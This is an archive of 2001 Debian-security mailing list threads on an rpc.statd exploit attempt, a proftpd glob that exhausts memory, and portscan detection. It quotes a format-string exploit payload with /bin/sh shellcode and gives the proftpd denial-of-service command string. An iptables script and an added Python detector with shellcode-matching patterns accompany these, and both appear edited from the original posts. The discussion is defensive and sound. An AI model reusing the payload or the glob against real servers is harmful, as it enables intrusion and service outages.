Re: strange log entry
Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely.

--- Wade

On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes:

> Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet:
> [rpc.statd log entry quoted in full; see the original "strange log entry" message below]
> and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs

--
 ASCII Ribbon Campaign   | Wade Richards --- [EMAIL PROTECTED]
 - NO HTML/RTF in e-mail | Fight SPAM! Join CAUCE.
 - NO Word docs in e-mail | See http://www.cauce.org/ for details.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:

> the last two I understand, as well as domain, but sunrpc and 1171?

man fuser. Look for the -n option.

> I've cleaned up everything I can think of, but X11R6 says it still needs the RPC packages. Why does/would X11 require RPC?
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:

> Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.

Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!" Which begs the question, especially since the *BSDs release their sources under BSD-style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

Simply curious,
[EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:

> BS, when was the last time you installed OpenBSD? I just did an install 2.5 today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.

In 2.5 ftpd, portmap, smtp, and identd were open; I am pretty sure rstatd was not. 2.6 I think disabled ftpd by default; shortly thereafter a root hole was found in OpenBSD's ftpd and they promptly said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install'.

--
Ethan Benson
http://www.alaska.net/~erbenson/
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:

> OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!" Which begs the question, especially since the *BSDs release their sources under BSD-style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once.

noah
--
Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html
RE: strange log entry
Hello, that's simple ;) If they were stable/non-exploitable then we'd be using rpc in place of ssh ;)

Ed

-----Original Message-----
From: Jacob Meuser [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 8:41 AM
To: [EMAIL PROTECTED]
Subject: Re: strange log entry

On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
> On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
> > BS, when was the last time you installed OpenBSD? I just did an install 2.5

That was what, 2 years ago?

> > today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.
>
> in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they promptly said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install'

Ah, they probably caught the problem shortly before the 2.6 release, and didn't have time to fix the ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default.

Like I said, I didn't want to start a discussion about OpenBSD vs Linux. I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk credibility by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also?

[EMAIL PROTECTED]
RE: Problem with logging firewall packets
Hello, Make sure you have klogd and syslogd running.

Ed

-----Original Message-----
From: Paul Dossett [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 12:00 PM
To: [EMAIL PROTECTED]
Subject: Problem with logging firewall packets

Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?

Thanks... Paul D
msg from list when posting.
Hello, anyone know why I get this when I post anything to this list?

Fatal Error: \n \nQuota for user [EMAIL PROTECTED] exceeded! \n \nOriginal message follows: \n \n

It's from their mail delivery subsystem.

Ed

-----Original Message-----
From: Ed Street [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 12:10 PM
To: [EMAIL PROTECTED]
Subject: RE: strange log entry

> [Ed's "RE: strange log entry" message, including the quoted Jacob Meuser / Ethan Benson exchange, repeated in full; see above]
Re: Problem with logging firewall packets
I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat.

ppp

----- Original Message -----
From: Ed Street [EMAIL PROTECTED]
To: Paul Dossett [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Friday, May 25, 2001 2:17 AM
Subject: RE: Problem with logging firewall packets

> Hello, Make sure you have klogd and syslogd running.
>
> Ed
>
> [Paul's original "Problem with logging firewall packets" message quoted in full; see above]
Re: Problem with logging firewall packets
----- Original Message -----
From: Ronny Adsetts [EMAIL PROTECTED]
To: Paul Dossett [EMAIL PROTECTED]
Sent: Friday, May 25, 2001 2:27 AM
Subject: RE: Problem with logging firewall packets

> > Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?
>
> Probably klogd is missing. try:
> # apt-get update
> # apt-get install klogd

It was installed, but the kicker was that something seemed to be wrong with the init script: the syslogd and klogd daemons weren't restarting when I executed their scripts, so the changes I made in the syslog.conf file were being ignored. Manually killing the processes and restarting them worked, and logging is back... thanks all! Hopefully I can return the favour for some *other* foolish newbie... ;)

ppp
Re: Problem with logging firewall packets
Haven't seen this before, but a workaround could be to just have syslog-ng read from /proc/kmsg; it does the same thing as klogd would do.

On Fri, 25 May 2001, Paul Dossett wrote:

> I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat.
>
> ppp
>
> [Ed Street's reply and Paul's original "Problem with logging firewall packets" message quoted in full; see above]
proftpd exploit??
Hi!! I have Potato in a machine, with

ii  proftpd  1.2.0pre10-2.0  Versatile, virtual-hosting FTP daemon

It's the last version in security.debian.org. I've tried to exploit it by logging in and sending:

ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../

and suddenly it began eating memory and making the whole system slow. When I killed proftpd, the system was almost KO. Any solution?? Thanks in advance :-)

--
101 Things you do NOT want your System Administrator to say.
93. We don't support that. We won't support that.
--
Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054
Re: proftpd exploit??
On Thu, 24 May 2001, Andres Herrera wrote:

> I've tried to exploit it by logging in and sending:
> ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
> and suddenly it began eating memory and making the whole system slow.
> ...
> Any solution??

Resource limits on the ftp server process?

Zak.
Re: proftpd exploit??
Zak Kipling wrote:

> On Thu, 24 May 2001, Andres Herrera wrote:
> > I've tried to exploit it by logging in and sending:
> > ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
> > and suddenly it began eating memory and making the whole system slow.
> > ...
> > Any solution??
>
> Resource limits on the ftp server process?

What about PathDenyFilter?

robt
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote:
> On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:
> > the last two I understand, as well as domain, but sunrpc and 1171?
>
> man fuser. Look for the -n option.

... or look for the -p option of netstat :)

Mirek
Re: proftpd exploit??
Hi!! Thanks to everybody (and sorry for my English 0:) ) I've chosen the DenyFilter option and everything goes OK again :-) The user just gets a "Forbidden command argument" message. ... and certainly I'm subscribing my account to the proftpd mailing list ;-)

Thanks again

--
101 Things you do NOT want your System Administrator to say.
94. ...and after I patched the microcode...
--
Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054
detecting portscanning
Hello Everyone, It is my first time I'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else.

Thanks in advance, Rudy
--
e: [EMAIL PROTECTED]  phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/  http://zeus.rug.ac.be
Re: detecting portscanning
On Thu, 24 May 2001, Rudy Gevaert wrote:

Hello again, Some people suggested ippl; I installed it, and it runs. It works :-) Some other people said I should use portsentry. And I looked for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right?

Again, thanks in advance, Rudy
--
e: [EMAIL PROTECTED]  phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/  http://zeus.rug.ac.be
Re: detecting portscanning
On Thursday 24 May 2001 14:01, Rudy Gevaert wrote:

> [Rudy's "ippl works, should I use portsentry from unstable?" message quoted in full; see above]

The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware.
RE: detecting portscanning
Hello, there are several methods to tell that.

a) use a product like portsentry
b) use iptables/ipchains to reject all forms of portscans
c) don't connect the box to the inet as portscans are a fact of life ;)

portsentry will trashcan any system that attempts to portscan you. If you're using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans.

iptables has an awesome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literally take HOURS to return nothing.

Ed

-----Original Message-----
From: Rudy Gevaert [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 4:17 PM
To: [EMAIL PROTECTED]
Subject: detecting portscanning

> [Rudy's original "detecting portscanning" message quoted in full; see above]
RE: detecting portscanning
On Thu, 24 May 2001, Ed Street wrote:

> Hello, there are several methods to tell that.
>
> a) use a product like portsentry
> b) use iptables/ipchains to reject all forms of portscans
> c) don't connect the box to the inet as portscans are a fact of life ;)
>
> portsentry will trashcan any system that attempts to portscan you. If you're using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans.
>
> iptables has an awesome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literally take HOURS to return nothing.

Ok thanks, I'll use iptables when I get my network running. Now it is just a standalone box. I'm running ippl and it logs most things. It will work for now I think ;)

Thanks to everyone for all the help!

Greetings, Rudy
--
e: [EMAIL PROTECTED]  phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/  http://zeus.rug.ac.be
RE: detecting portscanning
#!/bin/sh
# Variables the rules below rely on; the posted fragment left them undefined,
# so set them to suit your box.
IPTABLES=/sbin/iptables
LOG_LEVEL=info
LIMIT_RATE=5/minute

echo "Rejecting Portscans"
#
# Reject Xmas scans (FIN, URG and PSH set, nothing else)
#
# Generic dirty interface mapping
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
# This disallows ALL portscans that will hit the PREROUTING table
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
#
# Reject FIN scans (a lone FIN that belongs to no established connection)
# Note: current iptables writes the negation as "! --state"; the posted
# fragment used the older "--state ! ESTABLISHED" spelling.
#
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state ! --state ESTABLISHED \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state ! --state ESTABLISHED -j DROP
# This disallows ALL portscans that will hit the PREROUTING table
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN -j DROP
#
# Reject ANY station that opens and immediately closes a connection
# (SYN and FIN set together). Some portscanners do this.
#
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j DROP
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
$IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN -j DROP
#
# Invalid crap: log anything connection tracking cannot classify
#
$IPTABLES -t mangle -A PREROUTING -m state --state INVALID \
    -m limit --limit $LIMIT_RATE -j LOG --log-level $LOG_LEVEL
#

This isn't complete as the SYN scan will still get through BUT it will take ages to show anything. Also use of rp_filter ('spoof' protection) helps out too.

Ed

-----Original Message-----
From: S.Salman Ahmed [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 8:11 PM
To: [EMAIL PROTECTED]
Subject: RE: detecting portscanning

Ed == Ed Street [EMAIL PROTECTED] writes:

    Ed> iptables has an awesome mechanism for portscans ;) in fact you
    Ed> can set it up so that all portscans (well most I should say)
    Ed> will literally take HOURS to return nothing.

What iptables rule(s) would cause that behaviour ?

--
Salman Ahmed
ssahmed AT pathcom DOT com
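Added example, not from Ed's post or the thread: once rules like the ones above are in place, klogd hands their LOG output to syslog as "kernel:" lines, and the script below summarises those lines per source address to answer Rudy's "who, when and how many" question directly from the firewall log. The field layout follows the LOG target's usual output, the sample lines are constructed, and the reporting thresholds are my own.

```python
"""Summarise portscans from kernel LOG lines in /var/log/messages.

Added example. Groups the LOG target's 'kernel:' records by source address and
reports when each source was seen, how many packets it sent, how many distinct
destination ports it touched and which scan-style flag combination it used.
"""
import re
from collections import defaultdict

KERNEL_LOG = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} [\d:]{8}) (?P<host>\S+) kernel: (?P<rest>.*IN=.*)$"
)
FIELD = re.compile(r"\b([A-Z]+)=(\S*)")
# Flag words the LOG target prints for TCP packets.
FLAG_WORDS = ("SYN", "ACK", "FIN", "RST", "PSH", "URG")
# Combinations the rules above log; a normal client never sends these.
SCAN_SIGNATURES = {
    frozenset({"FIN", "URG", "PSH"}): "xmas",
    frozenset({"FIN"}): "fin",
    frozenset({"SYN", "FIN"}): "syn-fin",
}


def parse_log_line(line):
    """Return a dict for a kernel LOG record, None for any other syslog line."""
    m = KERNEL_LOG.match(line)
    if not m:
        return None
    rest = m.group("rest")
    fields = dict(FIELD.findall(rest))
    # Flag words stand alone; URGP=0 must not be read as URG, hence \b.
    flags = frozenset(w for w in FLAG_WORDS if re.search(rf"\b{w}\b", rest))
    return {
        "ts": m.group("ts"),
        "src": fields.get("SRC"),
        "dst": fields.get("DST"),
        "proto": fields.get("PROTO"),
        "dpt": int(fields["DPT"]) if "DPT" in fields else None,
        "scan": SCAN_SIGNATURES.get(flags),
    }


def summarise_scans(lines, min_ports=5):
    """Per source: first/last time, packet count, distinct ports, scan types.

    A source is reported if it hit at least min_ports distinct ports or sent
    any packet carrying a scan-signature flag combination.
    """
    per_src = defaultdict(lambda: {"first": None, "last": None, "packets": 0,
                                   "ports": set(), "types": set()})
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["src"] is None:
            continue
        s = per_src[rec["src"]]
        s["first"] = s["first"] or rec["ts"]
        s["last"] = rec["ts"]
        s["packets"] += 1
        if rec["dpt"] is not None:
            s["ports"].add(rec["dpt"])
        if rec["scan"]:
            s["types"].add(rec["scan"])
    return {src: s for src, s in per_src.items()
            if len(s["ports"]) >= min_ports or s["types"]}


def _line(ts, src, dpt, flags):
    # Constructed sample in the LOG target's field layout (MAC= omitted).
    return (f"{ts} noogies kernel: IN=eth0 OUT= SRC={src} DST=192.0.2.10 LEN=40 "
            f"TOS=0x00 PREC=0x00 TTL=48 ID=4242 PROTO=TCP SPT=40123 DPT={dpt} "
            f"WINDOW=1024 RES=0x00 {flags} URGP=0")


# Constructed sample log: one Xmas sweep, one lone SYN, one SYN/FIN probe.
SAMPLE_LOG = (
    [_line("May 24 22:10:01", "192.0.2.45", p, "FIN URG PSH") for p in (22, 23, 25)]
    + [_line("May 24 22:10:02", "192.0.2.45", p, "FIN URG PSH") for p in (80, 111)]
    + [_line("May 24 22:10:03", "198.51.100.7", 22, "SYN"),
       _line("May 24 22:11:40", "203.0.113.9", 21, "SYN FIN"),
       "May 24 22:12:00 noogies -- MARK --"]
)

if __name__ == "__main__":
    for src, s in summarise_scans(SAMPLE_LOG).items():
        print(f"{src}: {s['packets']} packets, {len(s['ports'])} ports "
              f"{sorted(s['ports'])}, {sorted(s['types'])}, "
              f"{s['first']} .. {s['last']}")
```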
Re: detecting portscanning
Hello,

--- Rudy Gevaert [EMAIL PROTECTED] wrote:

> It is my first time I'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else.

Check out www.snort.org. Snort is capable of detecting portscans. Note that it detects not only portscans, but other strange activities (i.e. tracing, OS fingerprinting, etc.) and attacks. You can download the sources from the original site or get a *.deb from Debian (it is included in the latest release).

Regards, Vladislav.
--- http://cybervlad.port5.com
strange log entry
Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs
RE: strange log entry
Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.

Ed

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 1:08 AM
To: debian-security@lists.debian.org
Subject: strange log entry

> Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet:
> [rpc.statd log entry quoted in full; see the original "strange log entry" message above]
> and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs
Re: strange log entry
On Wed, May 23, 2001 at 10:58:43PM -0700, Wade Richards wrote:
> Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely.

That only blocks portmap. Other UDP services can be found with a UDP port scan by e.g. nmap.

-- 
#define X(x,y) x##y
Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca)

The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BCE
Re: strange log entry
Definitely a security problem. But the fact that you actually saw something is good news .. it means the exploit didn't work. If it had worked, the thing would just die quietly and not log anything.

Better off without rpc anyway, unless you *need* it for NFS or something similar. And if you really need it, make sure it's firewalled.

I get about 30 similar rpc.statd scans every day on most of my machines. Glad they're not running rpc.statd :)

--Henry

On Thu, 24 May 2001 [EMAIL PROTECTED] wrote:
> Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet:
>
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for [exploit payload omitted]
>
> and it has me worried it may be a security issue.
> I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :)
> Thank you - trevs
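Henry's point is that the entry only exists because the attempt failed, which makes it worth alerting on. The detector below is an added example for this thread, not code from the list or from Debian; its log lines are constructed (the sled is shortened from the one trevs posted) and the thresholds of 8 sled bytes and 4 %x directives are my own choices.

```python
"""Flag rpc.statd format-string exploit attempts in syslog text.

Added example for this thread (not a Debian tool and not trevs' or Henry's
code). It looks for what is visible in the quoted entry: %n directives,
a run of octal-escaped 0x90 bytes (sysklogd writes the byte as \\220, so
the NOP sled survives in the file as text), and '/bin' ... '/sh' close
together, which no hostname argument to gethostbyname should contain.
"""
import re
import sys

# Indicators. sysklogd escapes non-printable bytes as three-digit octal,
# so a 0x90 byte appears in /var/log/messages as the four characters "\220".
FORMAT_WRITE = re.compile(r"%\d*n")          # %n, %236n: write to memory
FORMAT_READ = re.compile(r"%\d*x")           # %8x: read up the stack
NOP_SLED = re.compile(r"(?:\\220){8,}")      # 8+ consecutive 0x90 bytes (assumed threshold)
SHELL_STRING = re.compile(r"/bin.{0,8}/sh")  # "/bin" and "/sh" a few bytes apart
STATD_LINE = re.compile(r"rpc\.statd\[\d+\]: gethostbyname error for (.*)$")

# Constructed sample, modelled on the entry quoted in the thread. The sled is
# cut to 40 bytes; the real one ran to several hundred. Line 3 is the
# rpc.statd line itself, line 4 the continuation that carried the shellcode.
SAMPLE_LOG = "\n".join([
    "May 24 10:08:11 noogies -- MARK --",
    "May 24 10:19:02 noogies /sbin/rpc.statd[151]: gethostbyname error for nfs1.example.test",
    "May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for "
    "^X\\367\\377\\277^X\\367\\377\\277%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
    + "\\220" * 40,
    "May 24 10:20:34 noogies \\307^F/bin\\307F^D/shA0\\300\\210F^G\\211v^L",
    "May 24 10:21:00 noogies sshd[200]: Accepted publickey for alice from 192.0.2.10",
])


def indicators(line):
    """Return the indicator names present in one syslog line, in a fixed order."""
    m = STATD_LINE.search(line)
    payload = m.group(1) if m else line   # continuation lines have no daemon prefix
    found = []
    if FORMAT_WRITE.search(payload):
        found.append("format-string-write")
    if len(FORMAT_READ.findall(payload)) >= 4:   # a few %x in a hostname is already odd
        found.append("format-string-read")
    if NOP_SLED.search(payload):
        found.append("nop-sled")
    if SHELL_STRING.search(payload):
        found.append("shellcode-string")
    return found


def scan(text):
    """Return [(line_number, indicators)] for every line that trips a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        found = indicators(line)
        if found:
            hits.append((n, found))
    return hits


def verdict(hits):
    """'exploit-attempt' if any line shows a memory write or shellcode,
    'probe' if only stack reads or a sled were seen, else 'clean'."""
    names = {name for _, found in hits for name in found}
    if names & {"format-string-write", "shellcode-string"}:
        return "exploit-attempt"
    return "probe" if names else "clean"


if __name__ == "__main__":
    # Run over a real file (python3 statd_scan.py /var/log/messages) or the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    hits = scan(text)
    for n, found in hits:
        print(f"line {n}: {', '.join(found)}")
    print("verdict:", verdict(hits))
```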
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
> Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.

Not to start a thread discussing OSes, but ...

OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!"

Which begs the question, especially since the *BSD's release their sources under BSD style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

Simply curious,
[EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
> On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
> > Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.
>
> Not to start a thread discussing OSes, but ...
>
> OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!"
>
> Which begs the question, especially since the *BSD's release their sources under BSD style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other than portmap) openbsd does not consider that a `remote hole in the *default install*'. they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default.

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
wdm security
I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm replacement.) According to lsof -i TCP, there are a number of processes listening on the port.

When using X, I accept the obvious port 6000 being open for inbound connections and I believe XFree is secure enough with it (I only allow local logged-in user from localhost to contact to my X server) but what is this wdm doing listening on 32768? nmap says it's an unknown port and /etc/services does not recognise it. IANA seems to recognise the port as

filenet-tms 32768/tcp Filenet TMS
filenet-tms 32768/udp Filenet TMS

but I have no idea what Filenet TMS is.

I am a little at a loss with this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked).

For what it's worth, my wdm is Version: 1.20-5, from unstable. The newest seems to be 1.20-10, but I am in a habit of upgrading unstable stuff only if there is a problem/security issue. (Because things sometimes break, like alsa-utils was broken last week.)

-- 
Juha Jäykkä, [EMAIL PROTECTED]
home: http://www.utu.fi/~juolja/
Re: strange log entry
On Thu, May 24, 2001 at 12:43:40AM -0800, Ethan Benson wrote:
> On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
> > On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
> > > Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.
> >
> > Not to start a thread discussing OSes, but ...
> >
> > OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!"
> >
> > Which begs the question, especially since the *BSD's release their sources under BSD style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?
>
> because that underlined portion is the key here, OpenBSD keeps the rpc stuff turned off by default, thus even if a root hole is found in a rpc service (other than portmap) openbsd does not consider that a `remote hole in the *default install*'. they are quick to mention this every time a hole is found in any daemon OpenBSD ships with but leaves off by default.

BS, when was the last time you installed OpenBSD? I just did an install today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.

[EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
> BS, when was the last time you installed OpenBSD? I just did an install

2.5

> today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.

